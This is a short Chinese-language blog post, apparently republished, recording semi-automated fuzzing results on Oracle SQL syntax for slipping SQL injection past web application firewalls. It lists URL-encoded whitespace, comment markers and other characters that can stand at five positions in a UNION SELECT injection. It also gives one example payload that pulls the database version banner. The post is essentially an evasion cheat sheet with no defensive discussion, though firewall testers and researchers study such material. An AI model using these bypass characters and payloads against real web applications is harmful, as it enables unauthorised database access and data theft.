WAF Bypass數據庫特性(Oracle探索篇)
阿新 • • 發佈:2017-08-01
位置 null ner mysq 記錄 sel acl oracle %20
0x01 背景
oracle與mysql特性類似,半自動化fuzz了一下,記錄成果。
0x02 測試
位置一:參數和union之間的位置
1)空白字符
Oracle中可以利用的空白字符有: %00 %09 %0a %0b %0c %0d %20
2)註釋符號/**/
3)其他字符
%2e . 點號
位置二:union和select之間的位置
1)空白字符
Oracle中可以利用的空白字符有: %00 %09 %0a %0b %0c %0d %20
2)註釋符號/**/
位置三:select和查詢參數之間的位置
1)空白字符
Oracle中可以利用的空白字符有: %00 %09 %0a %0b %0c %0d %20
2)註釋符號/**/
3)其他字符
%2b +
%2d -
%ad
select * from emp where mgr=7782 union select+NULL,(SELECT banner FROM v$version where rownum=1),NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL
位置四:查詢參數和from之間的位置
1)空白字符
Oracle中可以利用的空白字符有: %00 %09 %0a %0b %0c %0d %20
2)註釋符號/**/
位置五:from後面的位置
1)空白字符
Oracle中可以利用的空白字符有: %00 %09 %0a %0b %0c %0d %20
2)註釋符號/**/
WAF Bypass數據庫特性(Oracle探索篇)